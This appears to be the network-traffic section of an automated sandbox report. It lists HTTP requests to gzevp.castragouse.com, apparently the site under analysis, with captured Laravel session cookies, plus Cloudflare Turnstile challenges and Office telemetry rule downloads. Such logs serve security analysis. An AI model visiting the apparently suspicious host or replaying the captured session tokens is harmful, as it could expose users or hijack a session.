Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gzevp.castragouse.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gzevp.castragouse.com/fzFA/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkI3Q3JrUHM2RlFOYVhTTUtNWDljanc9PSIsInZhbHVlIjoieE80UGRTZVFwSkdCOXlFb3R5Ujdrd2RneVovUlhDT0FFWE9XKytZMlFrNlFJbG5MQ0ZWVjBFOFhEenRkbDFrdEVIbGxKYnNIMkFvZGlFRTBsOUVaR25aNnR3aVg1SG4zQW1tdVJHT0loc2ZWNlZsb3NhZmZVR2RSSEpVdDlDY0ciLCJtYWMiOiI3MmVjYTA2OTEzZDQ4OGVkNDc4NTk5MDIzNGMyZDRmZDNkMTk4N2MzZDlkODdjNGMwYzI2ZWQwNDA2MGE4YTcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZJQkErOFdPeXh6UUNVOGRadHlBcWc9PSIsInZhbHVlIjoiL3k1azVlSE5mRzdvUHFQK3J5NmdGUFJva2xoMnRMTnpYK3ZvUEt5ZXo4SldwVEVyMUMwRzNGZm05alA4ZStZSnptbHZzbXYwdlBEdWt3ZjdVem5iWExwZnFtUEg3ZHJYUDlnWm1ENitGc1hXOHVyVmlyUzhXeEZLQXJEakNEcU0iLCJtYWMiOiJjMDI0NjU0MzNlNzg1ZTNmNzlmM2UxZDAwYmNkMTkzN2I3MzZkYjkyOTkyNDE0MzJmZGQ3NTQ5ZGZhMTJhN2U1IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cf2ed9a6c2641de&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cf2ed9a6c2641de/1728356926476/d0b746da8873d4f65ab80d8b6cd196c528cd2de035e23a9105e09ed097c28824/GvsOwHEulO0pCOy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cf2ed9a6c2641de/1728356926478/QCsHjgUpquPAy0Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cf2ed9a6c2641de/1728356926478/QCsHjgUpquPAy0Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
